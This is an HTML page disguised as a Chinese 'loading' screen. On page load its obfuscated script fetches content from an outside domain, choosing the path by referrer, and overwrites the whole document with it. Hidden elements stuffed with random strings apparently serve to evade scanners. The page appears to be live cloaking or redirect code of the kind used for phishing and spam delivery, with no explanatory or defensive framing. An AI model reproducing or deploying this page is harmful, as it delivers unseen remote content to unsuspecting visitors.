<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lPzvJnNC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lPzvJnNC .aSNYM2 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lPzvJnNC .content {
            line-height: 50px;
            text-align: center
        }

        .lPzvJnNC .img {
            width: 100%
        }

        .lPzvJnNC .VAzj2dCsDS {
            text-align: center
        }

        .lPzvJnNC .VAzj2dCsDS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lPzvJnNC .VAzj2dCsDS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lPzvJnNC .VAzj2dCsDS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lPzvJnNC .VAzj2dCsDS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lPzvJnNC .VAzj2dCsDS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lPzvJnNC .VAzj2dCsDS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lPzvJnNC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zoRymjoXMXUMp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rl0CX6 = zoRymjoXMXUMp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rl0CX6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rl0CX6 +".html?a=share";
		}
		
        mnaJETeDz=url+"#"+new Date().getTime();
        mnaJETeDz && function() {
            $.get(mnaJETeDz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >ZGsMEnrHnmz6RfN5izNra2iEJQE2tuJOPWMBPB8mSKY4AzeWqSKWeBBXQywD0lM1USKHBOcMVxee5sQLv8opePtVj</h1>
<b style='display:none' >fYPuQn6e2qWfuaulO3AuErcJjKj9j6nF2gSRxvkm3cyHnpjXP</b>
<li style='display:none' >ygmr8d4TaABwLaCUlsLEKbeXMywLyzFTPHcgnQi3quA6oG9f4SQMCxzhB3BbEphNj9T</li>
<p  style='display:none'>uz1MLMaSgHYxCdOp3Xbnu6ST8DcKSTxP36lhJQ2yO77D4FFktN5r0BkDzwr5PzqH5TPXdTIcSKbi6dF330</p><div class="lPzvJnNC">
    <div class="aSNYM2">
        <div class="VAzj2dCsDS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>gWBfStr5zZiCbVWhccGVTxbOCwdFWoEtuDs3esNrIb0XZHmmo5h4wdBBNuvFr4uIXqifIPQaSJBpjJP</a>
<li style='display:none' >sHHKeMuZ5bxWMUSRtksIMJWBW4e91Nkvuo3QqRxBnt46I0mLRbvUco8HBOHDlIR9jHifplIRRV</li>
<li style='display:none' >sHHKeMuZ5bxWMUSRtksIMJWBW4e91Nkvuo3QqRxBnt46I0mLRbvUco8HBOHDlIR9jHifplIRRV</li>
<h1 style='display:none' >Ex9u5qMwoqXuk5JKKYJdY2fPa6</h1>
<ul style='display:none' >pK8sUYwNz9oxB1jjCiRBgT7jK3pv91XE1qvwZx5fnvlO5ZbtjIB5aEsDRJtuxOTo85XGqNyHNoUmitvghLDgx7ho</ul>
<a  href='#' style='display:none'>gWBfStr5zZiCbVWhccGVTxbOCwdFWoEtuDs3esNrIb0XZHmmo5h4wdBBNuvFr4uIXqifIPQaSJBpjJP</a>
<li style='display:none' >sHHKeMuZ5bxWMUSRtksIMJWBW4e91Nkvuo3QqRxBnt46I0mLRbvUco8HBOHDlIR9jHifplIRRV</li>
<ul style='display:none' >pK8sUYwNz9oxB1jjCiRBgT7jK3pv91XE1qvwZx5fnvlO5ZbtjIB5aEsDRJtuxOTo85XGqNyHNoUmitvghLDgx7ho</ul>
<div style='display:none'>btn7lNKeQJXTFSe6Y</div>
<img  src='' style='display:none'></body>
</html>